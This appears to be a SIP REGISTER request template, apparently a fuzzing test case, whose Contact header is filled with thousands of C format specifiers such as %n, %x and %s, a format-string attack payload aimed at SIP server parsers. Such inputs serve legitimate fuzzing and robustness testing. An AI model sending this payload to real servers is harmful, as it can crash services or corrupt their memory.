REGISTER sip:[Server_Uri] SIP/2.0
Call-ID: [Call_Id]@[IP]
CSeq: [CSeq] REGISTER
From: "linfeng" <sip:[From_User]@[Server_Uri]>;tag=[Tag]
To: "linfeng" <sip:[From_User]@[Server_Uri]>
Via: SIP/2.0/UDP [IP]:[PORT];branch=[Branch]
Max-Forwards: 20
Expires: 10800
Authorization: Digest username="[From_User]@[Server_Uri]",realm="[Server_Uri]",nonce="",response="",uri="sip:[Server_Uri]"
Supported: path
Contact: %.*s%n%x%x%.555d%n%n%*d%.127d%x%s%.127d%x%.127d%.*s%.*ss%%.555ds%%.127d%s%x%*d%.127d%*.*s%x%*ds%%*s%.*s%.127d%n%*s%n%.555ds%%x%s%*s%xs%%*s%n%n%n%.555d%n%ss%%*.*s%*d%*.*s%*s%x%.127d%*.*s%x%*.*s%.*s%*s%*.*s%*d%ns%%.*s%n%x%x%n%x%*.*s%*d%.555d%.127d%n%*s%x%n%.127d%*s%n%x%n%.127d%.555d%*.*s%n%ss%%.555d%x%x%x%.*s%s%x%.*s%.555d%x%*.*s%*s%n%.555ds%%*.*s%n%n%n%.*s%*d%s%*d%n%s%*.*s%*d%.555d%.127d%*d%.555d%x%x%x%.555d%.*s%s%*d%*s%*.*s%.*s%*d%*.*s%s%n%n%*d%x%x%n%x%n%*s%x%*s%n%n%.*s%.127d%x%s%x%s%*d%x%n%.555d%*s%n%x%x%*.*s%s%.555d%s%n%.127d%n%*s%.127d%*d%n%*d%.127d%n%*.*s%*ds%%.127d%x%x%x%.127d%.127d%.*s%.*s%xs%%s%.555ds%%.555d%.*s%.*s%*.*s%*s%.127d%.127d%*d%*ss%%.555d%x%*.*s%.*s%x%n%s%.127d%n%*ds%%s%n%.127d%ns%%.*s%.555d%x%*s%n%*ss%%.127d%*.*s%s%n%.*s%*d%*.*s%n%.555d%.555d%.127d%.127ds%%n%*.*s%n%*s%.*s%*s%.*s%x%.*s%*.*s%x%x%*.*ss%%x%*d%s%.*s%x%x%.127d%*s%*.*s%n%n%*d%.127d%n%x%*d%.127d%.*s%*d%*.*s%x%n%x%*s%n%*.*ss%%.555d%*d%*s%.127d%*.*ss%%*d%x%n%xs%s%%.555d%.127d%*s%n%.555d%*s%s%.555d%.127d%.*s%s%x%ns%%.*s%.*s%ns%%.555d%*.*s%.*s%*d%x%n%x%s%n%.127d%s%n%s%n%.127d%n%x%x%*ss%%.555d%s%n%.127ds%%*s%x%.555d%xs%%x%.555d%.*s%n%x%.127d%x%.127d%x%n%n%.127d%.127d%*s%.*s%*d%*d%s%.127d%x%*d%*s%*.*s%.*s%s%x%.127d%.*s%x%.127d%n%*.*s%s%s%*d%.127d%x%.*s%x%s%x%*d%.555d%.127d%.*s%.127d%n%.555d%x%*s%.555d%*s%*s%x%s%.*ss%%.*ss%s%%*d%n%*.*s%n%s%.555d%x%n%s%s%*d%n%.555d%n%.555d%n%x%.127d%n%*s%s%*s%*d%.127ds%%*s%.555d%n%n%xs%%*s%s%x%x%.555ds%%n%.555d%n%s%.555d%*s%.555d%*.*s%.555d%*s%.*s%*.*s%*d%.555d%x%*ss%%s%n%*s%*.*s%n%.127d%n%x%x%x%n%*s%n%.555d%x%.127d%*d%s%*s%n%s%.127ds%%*s%x%.555d%x%x%n%n%n%s%s%.*s%*.*ss%%*s%.127d%*.*s%.555ds%%.127d%.555d%n%n%*.*s%*.*s%x%s%n%*.*s%s%*.*ss%%n%*s%*.*s%.127d%x%s%*.*s%*.*s%*s%x%x%n%s%x%x%.127d%s%n%x%.555d%s%x%.127d%*.*s%.127d%x%.127d%*s%.*ss%%n%s%*.*s%s%n%x%.*s%*s%.555d%n%n%x%.*s%.127d%*s%s%.*s%.555d%.127d%x%x%.127d%*d%s%.*ss%%x%*d%*.*s%*s%*.*s%n%n%ns%%.127ds%%*.*s%n%*.*s%*d%.555d%s%*s%*s%.555d%*.*s%*.*s%ss%s%%n%*d%n%.127d%.*ss%%n%n%x%.*ss%s%%s%*d%n%s%xs%s%%*s%.555d%.127d%*d%.127d%*d%x%.555d%x%s%.555ds%%.555d%*s%*s%s%x%.127d%n%s%x%x%*.*s%.555d%x%x%*d%.555d%x%*d%.127d%x%x%n%*s%x%s%.555d%*.*s%n%n%xs%%s%s%x%*.*s%*d%*.*s%.*s%.*s%n%.555d%.127d%n%x%x%.555d%.127d%*d%n%n%.*s%*ds%%.555d%s%*.*s%.555d%n%x%*d%x%.127d%*ss%%.127d%.127d%.127d%x%*.*s%*s%*s%.555ds%%*s%n%*s%s%*s%s%*d%*d%x%x%.*ss%%*s%n%x%.555d%x%s%x%s%s%.*s%s%n%n%x%*.*s%n%.127d%x%.555d%x%*d%.555d%*.*s%*s%n%.*s%.127d%.555d%.555d%s%.555d%s%s%n%*.*ss%%.*s%.555d%x%*.*s%*d%x%n%*s%x%n%.555d%x%*.*s%n%n%*d%.127d%*.*s%*d%x%x%*s%.*s%n%*d%x%n%*d%*d%x%.555d%s%.127d%.127d%n%*ds%%x%*.*s%*d%*ds%s%%.*s%*d%n%x%n%n%*d%*d%n%*s%*d%*s%*s%x%x%n%*.*ss%s%%n%*ss%%.*s%.127d%.555d%xs%%.*s%.555d%.555d%s%*.*s%n%*.*s%*.*s%*.*s%.555d%n%.555d%n%*s%x%s%n%*s%.127d%n%x%*d%x%*s%n%.555d%.*s%n%*s%.*s%.555d%.555d%ss%%s%.555d%x%.*s%*s%.555d%*.*s%.555d%s%xs%%n%.127d%*.*s%.*s%x%.555d%*.*s%.555d%n%.127d%ns%s%%x%.127d%x%s%x%x%*.*s%x%x%x%.555d%x%.555ds%%*d%x%s%n%*d%.555d%*.*ss%%.127d%n%.*s%.555d%*.*s%.*s%x%x%x%.*s%x%.555d%n%.127d%x%*.*s%x%*.*s%.*s%*s%xs%%*.*s%n%x%*.*s%*s%n%x%x%*s%.555d%x%x%*s%x%.555d%.127d%*.*s%*.*s%*.*s%xs%%.*s%*.*s%.*s%s%ns%%*.*s%n%.*s%*.*s%.555d%.127d%.127d%n%.*s%.555d%xs%%n%.*s%x%.127d%*d%.*s%.*s%*d%n%n%*.*s%.*s%.*s%*s%.555d%*d%n%.555d%*s%s%*s%x%x%*.*s%.*ss%s%s%%*s%s%.555d%.*s%.555d%.555d%*ss%%x%*.*s%s%*d%x%.555d%x%x%n%.555d%n%x%.555d%*d%n%*.*s%n%*d%ns%s%%s%n%x%x%*.*ss%%.127d%.*s%s%.127d%.*s%*.*s%xs%%*.*s%*ss%%x%*.*s%.*s%.*s%*.*s%s%s%x%*s%x%*.*s%*d%s%s%*s%n%x%n%x%*s%.*s%x%.555d%*.*s%.127d%n%*s%s%.*s%n%*d%.555d%*d%.127d%*d%.555ds%%n%.555d%x%n%*ss%%x%.555d%.555d%*.*s%n%x%*s%ss%%*.*s%s%x%.*s%*.*s%s%x%s%*s%n%*.*s%*s%.127d%n%.555d%*s%.555d%x%*.*s%n%x%x%.555d%*.*s%.*s%.127d%.*s%.*s%.127d%x%x%*s%s%n%*ds%%*s%.127d%x%*s%.555d%.127d%*s%n%.127d%s%*.*s%n%.555d%*.*s%*s%n%.555d%n%*d%*ss%%n%x%.*s%*d%.*s%s%.555d%*d%.*s%n%.127d%n%.127d%n%s%*s%*d%x%n%*s%.555d%x%.*s%.127d%*.*s%*ss%s%%n%n%.555d%x%.127d%.555d%*d%s%.555d%xs%%.*s%*d%xs%%s%.127d%n%.127d%*.*s%n%*.*s%*s%.*s%*s%n%*d%.555d%s%s%.127d%*.*s%.127d%.555d%s%*.*s%n%*s%*.*s%.127d%n%x%*.*s%x%x%s%*.*s%*d%n%x%*d%*s%.127d%.555d%n%x%s%n%.127d%n%x%*.*s%*.*s%n%*d%*d%.*s%.*s%*d%.127d%n%*d%.*s%s%*ds%%s%x%n%*.*s%*d%n%n%*d%x%s%x%n%n%*s%.555d%.127d%*.*s%.*s%x%.127d%.127d%s%*ds%%.555d%x%*s%s%x%ns%%.*s%s%*d%s%*d%*.*s%x%x%*ds%%s%.*ss%%*.*s%n%n%*d%x%.*s%.*s%*.*s%x%x%.555d%x%*.*s%.127d%*s%.127d%*s%.555d%s%*.*ss%%*d%x%.555ds%%x%x%x%*s%n%*.*s%n%n%x%*s%*d%.*s%n%*d%n%.555d%n%.127d%s%n%.*s%x%*.*s%n%x%n%*s%n%x%*s%*d%*.*s%n%x%.*s%.127d%x%x%.127d%*d%n%n%x%.555d%x%.555d%.127d%x%xs%s%%n%x%x%.555d%x%*d%.555d%n%s%x%*.*s%x%x%*.*s%*ds%%*s%*.*s%n%.555d%x%n%*s%.555d%*d%n%s%*.*s%*d%n%*.*s%x%.555d%x%s%xs%%.*s%.*s%.127d%*s%*.*s%.555d%*.*s%*d%*s%*d%.127d%.127d%*d%*d%n%*s%*s%*d%.*s%.127d%n%x%.555d%*d%.555d%*d%*d%n%.*s%x%s%*s%x%s%s%.555ds%s%%n%x%n%ns%%*.*s%n%n%.555d%*d%ss%%x%n%n%.*s%*.*s%n%.*s%*s%.555d%*s%.127d%*.*s%.*s%*s%.555d%n%.555d%*s%n%n%.555d%x%*ss%%.127d%.555d%x%s%*d%*s%*.*s%.555d%*d%.555d%*.*s%.127d%*d%x%n%*d%s%*d%x%.555d%n%.*s%*.*s%*d%.555d%.555d%.127d%.*s%.127d%.*s%*s%.127d%*.*ss%%*d%*.*s%.*s%s%*d%.555d%.*s%.*s%n%*d%*s%.555ds%%*.*s%x%n%*s%.127ds%s%%x%n%.*s%s%*s%.*s%ns%%*s%n%*.*s%x%n%*ds%%*s%*d%n%n%n%x%*.*s%x%.127d%x%.555d%ns%%.127d%.555d%xs%%*.*s%n%.127ds%%.555d%.*ss%%.*s%.*s%*.*s%*s%n%.127d%*s%n%x%n%*ds%%*s%n%.*s%n%x%s%.*s%.555d%*.*ss%%*.*s%*s%s%.*s%n%x%s%.*s%.127d%*.*s%n%.555d%.*s%.127d%n%s%*ss%%.127d%.127d%.555d%x%.*s%*d%.555d%*s%.555d%n%x%x%*d%xs%%*d%*d%n%.*s%*d%.127d%.*s%n%.555d%s%n%s%x%.127d%n%.127d%*d%n%*.*s%.127d%n%n%*s%.*ss%s%%.127d%.*s%*s%s%n%s%n%*.*s%*ds%%*d%*ss%%.555d%.*ss%%s%*s%*d%ns%%s%x%.*s%.555d%.555d%.*s%n%.*s%n%x%.127ds%%*.*ss%%x%.*s%.127d%*s%*d%x%*ss%%*d%*.*s%.555d%.127ds%%.555d%*.*s%s%*d%.127d%*.*ss%%.*ss%%.555d%x%*s%.*s%*.*s%x%.555d%x%*s%.127d%x%n%ns%s%%.*s%*d%*d%.555d%x%.555d%x%x%s%*s%s%x%*d%*d%*s%ns%%x%s%*s%*.*s%n%*d%*ss%s%%n%x%*s%*s%.*s%*s%*s%n%.555ds%%ss%%x%n%ns%%.555d%x%x%n%x%*s%.127d%n%n%x%*d%x%x%.*ss%%s%*s%*s%n%n%n%n%*.*s%n%x%.127d%x%n%x%n%.*s%n%*s%n%*.*s%n%n%s%s%*s%s%.127d%*d%.127d%n%.*s%*s%.*s%x%*.*ss%%n%.*s%*s%x%s%x%*d%.*s%n%*d%n%x%*ss%%n%.*s%x%.555d%s%.127d%n%*.*s%*d%x%.555d%n%ns%%.555d%x%s%n%.555d%s%.555d%n%.127d%x%n%*.*ss%%.555d%x%x%*.*s%*.*ss%%ss%%n%*s%.127d%.*s%*s%.127d%.*ss%%ns%%.127d%n%n%*s%*ss%%.555d%n%x%*s%.127d%*ss%%*d%s%*d%x%n%.555d%x%n%.127d%.555d%*s%.127d%s%*s%*d%*d%x%*.*s%*.*s%.555d%.555d%*d%.555d%*s%x%*d%s%.*s%.*s%xs%s%%n%*.*s%*d%.127d%.*s%x%x%n%s%.555d%n%x%*s%*d%n%*.*s%*d%n%.127d%s%xs%%x%s%.555d%.*s%*s%x%n%*.*s%*s%*d%.555d%x%.*s%*.*s%.*s%n%*.*s%x%.127d%*s%x%xs%%.*s%*ss%%n%*d%*d%n%*.*s%x%n%*.*s%.555d%.555d%.*ss%%*d%n%.555d%x%x%*d%.*ss%%.*s%*ss%%*.*s%n%.555d%n%.*s%.*s%.555d%n%*d%.555d%x%x%x%.555d%s%x%*ss%s%%n%*d%.*s%.127d%s%.555d%x%.*s%.127d%x%*d%x%n%ss%s%%*s%.555d%*ds%%x%x%*d%.555d%*s%*.*s%*.*s%*.*s%x%*s%x%s%.555d%.555d%x%x%.*s%n%.555d%s%n%.127ds%s%%*ds%s%s%%x%.127d%x%*s%n%.555d%xs%%.555d%*.*s%.*s%.127d%.555d%*.*s%*s%x%*s%x%.127d%x%n%.127d%*.*s%*d%x%s%.555d%*d%xs%%x%s%*s%n%x%.555d%s%.127d%x%.127d%*s%x%*.*s%.127d%*d%n%*s%s%n%*.*s%*s%n%.127d%.127d%.555d%.555d%*d%.*s%s%*d%n%s%x%s%x%ss%%x%.127d%s%x%*.*s%s%*.*s%x%s%*s%n%n%*.*s%n%*.*s%.127ds%%.127d%n%.555d%.555d%*s%*.*s%n%n%x%x%*.*s%.*s%*s%*s%*ds%%.*s%x%x%n%.*s%*s%n%x%n%.555d%*d%.*s%x%*.*s%.*s%x%n%*.*s%*s%*d%s%*.*s%.127d%s%x%.555d%n%x%.555d%n%.*s%.*s%*.*s%s%.127d%.555d%n%s%.555d%x%x%n%.127d%*s%xs%%n%.*s%.*ss%%n%.555d%.*s%.555d%.555ds%%*s%s%ss%%x%.555d%.555d%*.*s%n%.*s%n%x%n%x%x%x%*d%*s%s%s%.555d%*d%*s%x%*.*s%x%*d%n%.555d%*d%.555d%.*s%n%.*s%n%.555d%n%x%x%*d%*d%.555d%n%n%*d%.*s%x%.*s%*d%n%.127d%*.*s%*d%.127d%*.*s%.555d%.127d%x%x%.*s%x%s%.127d%*.*s%x%x%n%*d%*s%*.*s%*s%.127d%ss%%s%.*s%*.*s%.*s%*.*s%*d%*.*s%.127ds%%n%*d%.127d%n%n%xs%%.*s%*s%x%s%.127d%.555d%.555d%.127d%*.*s%*s%*s%*.*s%xs%%*d%x%*.*s%n%*.*ss%%*d%n%*s%*d%.*s%x%.*s%x%x%n%.*s%.555d%*d%*ds%s%%*.*s%.555d%.*s%n%x%.*s%n%*s%.*s%*s%x%*d%.127d%*s%*.*s%*s%s%.*s%s%*.*s%n%*.*s%n%s%*.*ss%%s%n%*.*s%x%s%x%*s%s%.*s%*s%n%n%n%*.*s%.*s%s%*.*s%s%.127d%x%*d%ns%%.555d%n%.*s%x%s%x%n%.127d%.555d%.127d%x%*d%*d%*.*s%n%n%n%.127d%n%.*s%*d%s%n%x%n%n%ns%%.*s%*d%s%*d%.127d%*.*s%.555d%.*s%.555d%*s%.*ss%%.*s%*d%*s%xs%s%%x%xs%%.*s%.127d%x%*d%*d%*.*s%x%*d%x%.127d%x%n%*d%.555d%*.*s%*.*s%.*s%n%*s%ns%%s%n%n%.127d%*s%n%.127d%n%ns%%*d%n%n%x%.555d%s%x%s%n%.555d%n%*d%*d%.*s%.127d%*d%.127d%.555d%s%.555d%n%*.*s%x%*d%*d%.*s%*.*s%.555d%*s%n%x%*s%.*s%n%n%x%*s%x%*d%x%*d%x%*d%n%.*s%*d%*d%*d%x%s%*.*s%n%n%*s%*.*s%.127d%x%x%.127d%*s%*d%*d%*.*s%.127d%*.*s%.555d%.*s%n%s%s%n%.555d%*.*s%.555d%.*s%.127d%*d%n%n%.127d%.555d%*d%.127ds%%*.*ss%%x%n%n%.127d%n%*.*s%*d%*s%.*s%x%*.*s%n%*d%.555d%.127d%.127d%*.*s%*.*s%*.*s%n%s%*.*s%.127d%*s%.*s%*d%*.*ss%%.*s%*.*s%*d%x%s%.555d%n%*.*s%.555d%.*s%.555d%.*s%x%x%.*s%x%.555ds%%*s%x%*s%x%*d%*.*s%*d%*d%.555d%.127d%n%*d%.*s%.*s%x%n%n%x%.555d%.555d%.*s%*ds%%.555d%x%.*s%x%.*s%*.*s%*d%n%s%*.*s%s%*d%.555d%.555d%.127d%x%*.*ss%%x%s%.127d%*s%*d%s%.*s%.*s%n%x%.555d%n%n%ns%%ns%%*s%*d%n%*d%x%n%.127d%.555d%x%.*ss%%*d%s%*d%s%.*s%n%s%*s%n%.*s%.127d%x%x%s%.127d%x%*d%n%ns%%.555d%n%*.*ss%%.555d%n%.555d%x%x%*d%*s%s%*.*s%*s%*d%x%.127d%s%xs%%.*s%.127d%n%n%*.*s%*.*ss%%.127d%x%.127d%x%.*s%.*s%.*s%*d%*ss%%s%*ds%%*s%.*ss%%ss%%.127d%n%x%*d%.*s%n%x%*d%.555d%*s%ss%%.555d%*s%ss%%*ds%%.*s%x%ns%%x%xs%%x%n%s%.555d%.*s%.*s%s%*d%.*s%n%*ds%%*d%n%.555d%.555d%n%.555d%.127d%.*s%n%s%x%.*ss%%.*s%x%.*ss%%.555d%x%s%*s%.127d%*.*s%x%x%s%x%x%x%*d%n%.555d%*d%*d%.555d%.555d%*d%.127d%.555d%n%s%s%n%xs%%*.*ss%%.*s%ns%%s%x%.127d%n%s%n%x%.*s%.127d%.*s%n%*.*s%.*s%n%n%x%*.*s%n%*d%n%x%*s%xs%%s%.127d%*.*s%.*s%.*s%n%*d%n%.*s%*.*s%*d%.*s%.127d%n%n%.127d%n%n%n%.555d%.127d%.127d%.*s%s%s%*s%*.*s%x%.555d%x%*d%*s%*d%*d%.127d%*s%*d%*s%.555d%x%*ds%%n%*s%n%x%*d%ns%%xs%%*s%x%.127d%.*s%.*s%n%x%*d%.*s%*ss%%.*s%x%n%.555d%.*s%.127d%xs%s%%x%*s%.*s%.555d%x%.*s%x%*.*s%.127d%.127d%.127d%.*s%*d%x%*d%.127d%x%*.*s%n%x%.127d%*ss%%.127ds%%*d%x%*s%*d%.*s%s%*s%s%*.*s%n%.555d%x%x%x%*d%n%.127d%.555d%x%.127d%*s%*d%*s%n%.127d%n%*s%x%*d%.*s%.555d%.555d%*d%.555d%*d%.*s%*s%.*s%.*s%*s%*d%xs%s%%n%n%.*s%.*s%*.*s%*s%xs%%x%.127d%*ds%s%%xs%%.*s%.*s%n%*.*s%n%*.*s%*d%*d%x%n%.555d%.555d%x%x%x%n%s%*s%n%x%s%s%s%*ss%%*s%.127d%.555ds%%*s%.*s%.*s%*s%.555d%.127d%.127d%.555d%*.*s%.*s%.*s%.*s%.555d%*s%n%*ds%%x%.*s%x%x%*d%x%.*s%.555d%n%.*s%x%*s%.555d%.*s%.127d%.*s%s%.127d%*ds%%x%n%.*ss%%n%*d%.*s%n%s%n%n%s%n%s%.*s%.*s%ss%%ns%%*s%x%*s%x%s%s%x%*ds%%.555d%x%.127d%s%.555d%ns%%x%.555d%*d%*d%*d%s%.555d%*d%.*s%*d%.*s%n%xs%%*d%*.*s%*s%n%n%ns%%s%.*s%x%n%x%n%.555d%*s%.*s%x%*d%*d%n%x%.555ds%%x%x%*s%.127d%s%.*s%.555d%.*s%*.*s%n%n%n%*d%.*s%.127d%*s%x%.127d%n%.127d%n%n%*.*s%n%.127d%.127d%n%x%x%*.*s%n%.*s%.555d%n%*s%.555d%.*s%x%s%.*s%n%*.*s%.127d%x%.555d%x%x%n%x%.555d%s%*.*s%x%*d%*.*s%*d%*.*s%s%.*s%s%.127d%.*s%*.*s%s%.555d%.*s%.555ds%%.127ds%%*d%n%.127d%s%.*s%*s%.127d%.*ss%%*d%x%n%.*s%*d%*.*s%*ss%%.555d%.127d%*d%xs%%*d%x%.555ds%%s%x%*.*s%ns%%s%.*s%.555d%s%.*s%n%.555d%n%.555d%.127d%n%*ds%%.*s%s%x%ns%%s%x%ss%%n%*.*s%.555d%n%x%.127d%*.*s%n%.555d%*.*s%.555d%n%x%x%*s%x%s%x%.555d%*s%.*s%*ss%s%%.*s%.127d%*s%x%.*s%x%n%.*s%n%.555d%x%.127d%*s%n%.127d%x%x%n%x%*.*s%.555d%*d%x%.*s%n%x%n%.127d%.555d%*d%*d%ns%s%%x%*s%*.*s%*.*s%.*s%ns%%*s%.*s%.127d%s%x%.*ss%s%%.127d%xs%%n%.555d%.555d%.555d%*.*s%s%n%*.*s%n%x%*ss%%.*s%*d%n%*.*s%*ds%%.555d%.127d%x%.555d%x%x%.555d%x%.*s%n%s%*ss%%x%*d%*d%.127ds%%.555d%ns%%*s%.*s%x%.127d%*.*s%x%*s%x%n%n%s%.*s%*.*s%n%ns%%.555ds%%x%.127d%n%.*s%x%x%x%s%n%n%.*s%x%*ss%%.127d%n%*.*s%x%.127d%.127d%*s%n%x%.127d%*.*s%*.*s%xs%%*s%n%*s%x%x%x%*d%.555ds%%x%*.*s%s%x%*s%ns%%n%s%*.*s%.555d%*.*s%s%n%x%.*ss%%n%x%*d%.127d%*d%*.*s%*s%.*s%x%x%.555d%*s%xs%%.*s%.*s%.127d%.*ss%%x%*ds%%*d%*ss%%n%*.*ss%%n%.*s%*d%.127d%*d%n%n%*.*s%n%*.*s%n%x%.127d%n%.555d%*.*s%*s%.*s%x%.555d%*d%.127ds%%*d%.555d%*d%n%n%.*s%*.*s%*.*s%.*s%.*s%n%.127d%.555d%s%*.*s%*s%.*s%*.*s%.555d%*s%n%x%.555d%x%x%.127d%n%s%*s%*d%*ss%%s%n%.555d%.555d%x%x%*d%ss%%s%n%x%*.*s%n%x%.*s%.127d%.127d%x%*.*s%ns%%n%.*ss%s%%x%*.*s%s%n%*d%*s%.127d%*d%*.*s%n%.555d%*.*s%.*ss%s%%*s%x%*.*ss%%x%ns%%x%.*s%.*s%s%*s%*.*s%s%x%x%*d%.555d%s%n%*d%x%x%s%x%x%*s%s%.127d%s%x%n%.127d%n%.*s%.127d%.127d%*s%*.*s%*.*s%.555ds%%.555d%n%n%*.*s%*d%x%*s%.555d%*.*s%x%*d%.127d%.*s%*d%.555d%*.*s%*s%.*s%n%n%n%.127d%n%.555d%s%.*s%.127d%*d%*s%.*s%x%s%.*s%n%.*ss%%*s%*.*s%x%x%n%*s%*.*s%.555d%n%*.*s%n%.127d%.555ds%%.555d%*s%*.*s%n%.127d%xs%%.*s%*d%ns%s%%.127d%s%.127d%n%.555d%n%.*s%s%ns%%n%.555d%n%*.*s%*.*s%*d%*.*s%n%*s%x%n%*.*s%*.*s%*s%.*s%x%.127d%n%.*s%.555d%.*s%*ds%%n%*s%.*ss%%*.*s%s%.127d%.555d%.*s%x%.555d%n%s%s%*.*s%*s%xs%%.555d%n%.127d%x%x%*s%.*s%x%x%*s%.555d%n%*.*s%x%n%x%.555d%x%.*s%x%.*ss%%*d%n%*.*s%.*s%x%.*s%*s%x%.555d%s%.555ds%%*ds%%s%.*s%.*s%.*s%x%.555ds%%n%*s%n%n%.127d%x%*ss%%*ds%%n%.555d%.127d%ns%%*d%.555d%ss%s%s%%xs%%.*s%n%n%x%*ss%%.127d%.127d%x%*.*ss%%*s%*d%n%*ds%%x%s%s%*.*s%*s%n%*d%s%.127d%x%*.*s%.*s%s%.555d%n%s%.555d%*.*s%s%x%*s%s%*d%s%n%.555d%.127d%.555d%*d%*.*s%.555d%n%*.*ss%%.127d%x%.127d%n%.127d%n%s%x%*.*s%n%.555d%*.*s%*.*s%.127d%x%*s%*d%.555d%*s%x%x%*d%x%.555d%.555ds%%.555d%.*s%*s%x%n%s%.555d%s%x%s%.127d%x%*d%.127d%n%*.*s%.*s%x%.*s%*.*s%.127d%*.*s%x%*d%n%.555d%xs%%.*s%.555d%x%x%*ss%%*s%s%*s%*d%.127d%.555d%.*s%s%s%*d%s%*d%.127d%*d%*s%*.*s%.*s%ns%%.*s%x%*d%.127d%n%s%.555d%*s%*.*s%*.*s%n%n%.127d%*d%.*s%n%n%*d%x%*d%.127d%.*s%s%*d%x%n%.555d%*d%.555d%x%s%.*s%*s%.*s%xs%%x%n%*d%n%.*s%*s%s%.555d%.127d%x%*.*s%n%x%n%n%s%*d%*s%n%n%x%x%x%*s%n%n%n%*.*s%.127d%n%*.*ss%s%%n%x%.*s%n%.127d%.127ds%%.*s%.127d%.555d%*s%*s%.555d%x%*s%.*s%*d%n%x%*.*s%*d%n%.127d%*s%x%n%*.*s%.127d%n%.127d%s%*d%n%.*s%n%*.*s%s%*ss%%x%n%*s%.555d%x%n%n%.555d%.*s%*.*s%.127d%x%x%n%*s%.127d%n%n%.127d%*d%x%.127d%*.*s%*s%n%*.*s%s%x%n%*d%*.*s%x%*ss%%x%.127d%.*s%*s%.555d%*s%x%.127d%.*s%*.*s%n%x%n%*.*s%x%n%*d%x%*.*s%xs%%*.*ss%%.*s%.127d%*d%.555d%n%n%*.*s%n%.555d%xs%s%%s%*s%.555d%*.*s%*.*s%*d%.555d%x%x%*.*s%.555d%x%*.*s%*.*s%*s%n%x%x%.127d%*d%.555d%.127d%x%x%x%*s%n%*d%x%n%.127d%s%.*s%*.*ss%%x%*.*s%x%x%*d%.127d%*.*ss%%x%n%x%x%x%n%.555d%x%*ss%%x%*ss%%s%n%s%.*s%.555d%*.*s%n%.*s%*s%*.*s%.*s%.555ds%%.*s%n%*d%.555d%.*ss%%*s%n%x%s%xs%%*.*s%xs%%x%n%n%*d%x%.*s%*s%*s%*.*s%x%x%x%*.*s%*ds%%s%*d%x%s%*s%.555ds%%x%x%s%n%*s%n%.*s%*.*s%n%n%.127d%x%.*s%n%.*s%.555d%.555d%.555d%x%x%n%n%.*s%n%.127d%n%*d%.127d%n%x%*.*s%.*s%x%x%.127ds%%.*s%*s%*s%.*s%ns%%*.*s%*s%s%n%*.*s%x%n%*d%*.*s%.555d%x%*s%n%.555d%.*s%*s%s%n%.*s%s%.*s%x%n%*s%x%x%s%*.*ss%%n%*d%.555d%*.*s%x%x%.555d%xs%%n%x%.127d%.*s%s%s%*s%.*s%*.*s%*.*ss%%.*s%*s%n%.*s%*s%.127d%x%.555d%*d%.555d%ss%%s%.555d%x%.555d%.*s%*d%*d%.555d%s%.*s%*d%n%s%*.*s%n%xs%%x%*d%xs%%x%*.*s%*d%x%xs%%x%x%n%.555d%x%.*s%.555d%x%xs%%x%.*s%n%s%*d%*d%x%n%n%x%*s%*d%*d%x%*s%s%.*s%.*s%.555d%s%n%*d%xs%%.*s%s%ns%%x%.*s%xs%%n%n%*.*ss%%*s%*d%n%n%.127d%n%n%.127d%*s%.*s%.*s%.*s%*.*s%x%s%n%ns%s%s%%s%n%*s%.555d%*s%ns%%.*s%*.*ss%%*s%.*s%x%ns%%s%.127d%.*s%.555d%n%n%s%x%*s%.555d%s%s%.555d%s%*d%.*s%.127d%s%x%n%*d%n%.555d%x%n%*s%*s%*d%n%.127d%*.*s%ns%%.127d%*.*s%.555ds%%*d%x%*d%.*s%.*s%*.*s%.*s%*d%.555d%s%*s%n%n%*d%*d%*.*s%.555d%.127d%x%.555d%n%n%s%n%n%.*s%*d%x%n%s%.127d%.*s%s%.555d%s%.555d%x%.127d%x%*.*ss%%.127d%n%s%.555d%*d%x%.127d%*.*ss%%n%n%.*s%n%*.*s%x%s%*ds%%*s%.*s%.555d%.*s%n%.555d%*s%*ss%%x%n%n%n%*d%.555d%*.*ss%%.127d%.127d%.127d%*.*ss%%*.*s%x%n%x%n%s%x%*s%x%x%n%n%*d%.*s%*s%.555d%s%*s%.555d%.555d%.555d%xs%%*s%x%s%s%x%*d%ns%%*s%.555d%n%n%*.*s%*.*s%*d%n%*.*s%s%.*s%n%x%.555d%*ss%%xs%%x%n%x%n%.*s%.555d%.555d%x%.*s%x%*d%s%*ds%%.127d%.555d%s%x%*s%.555d%n%n%*ss%%n%*ds%%.*ss%%*.*s%*.*s%*d%.*ss%%n%ns%%x%*ds%%.127d%.555d%x%.555d%*s%*.*s%n%s%.555d%n%n%.*s%n%*ds%%n%x%xs%%.127d%*s%.555ds%%s%*s%*d%*d%n%n%*d%*.*s%*.*s%n%.555d%n%n%*d%x%.*s%*d%.555d%*.*s%.555d%*.*s%*d%*d%x%*d%*d%*d%x%.555d%.555d%s%x%x%*d%n%n%*d%x%.127d%*d%*s%.127d%n%s%n%n%*.*s%s%n%n%s%*d%n%x%*.*s%*.*s%x%n%*.*s%*ss%%*d%n%.127d%.*ss%%*s%.127d%.555d%n%n%*s%s%s%n%x%*s%n%.555d%*s%*s%x%s%n%*d%.127d%.127d%*d%.127d%*s%x%x%.555ds%%.127d%x%*s%x%x%n%.127d%n%.555ds%%x%.127d%s%.*s%x%.555d%.555d%n%.*s%.127d%ss%%.127d%.*s%.*s%.555d%n%*s%n%n%*d%*d%x%.*s%.555d%.*s%x%.*s%.555d%s%.127d%*s%n%*s%.*s%n%.555d%s%*d%x%.*s%s%.*s%.127d%n%*.*s%*d%.127d%n%s%.555d%n%s%.127ds%%n%ss%%x%n%.*s%*s%.127d%n%.*s%.555d%n%ns%%n%n%s%*.*s%.127d%.127d%*d%x%x%ss%%ss%%s%*d%*.*s%x%.555d%x%x%*d%.127d%.127ds%%x%*s%ns%%*d%xs%s%%.127d%x%n%*.*s%.555d%*d%x%n%n%x%.*s%x%ns%%.555d%*ds%%xs%%.555d%x%n%.127d%x%n%*s%s%*d%*s%s%s%.555d%n%x%x%*.*s%x%*.*s%n%*d%.555d%.*s%s%*s%*.*s%.555d%*d%*.*s%x%n%*ss%%.555d%ns%%.*s%*.*s%s%n%.555d%*.*s%n%*ss%%.127ds%%.127d%.555d%x%x%xs%%.*ss%%n%x%*.*ss%%*d%x%n%.555d%.127d%s%s%x%n%s%*d%s%*d%*s%n%n%n%*.*s%.127d%x%.*s%.555d%*.*s%.*s%*.*s%.*s%.*s%*d%x%.127d%s%x%*d%*.*s%*s%.555d%*.*s%x%*d%*.*s%*.*s%*s%.*s%x%*s%x%*d%.127d%n%x%x%x%*s%*.*s%*s%ns%%x%s%x%*s%.555d%ns%%x%.*s%s%.*s%x%*.*ss%%.127d%xs%%n%.555ds%%*s%s%*s%x%.*s%*d%n%s%n%.127d%.*s%.*s%.127d%.127d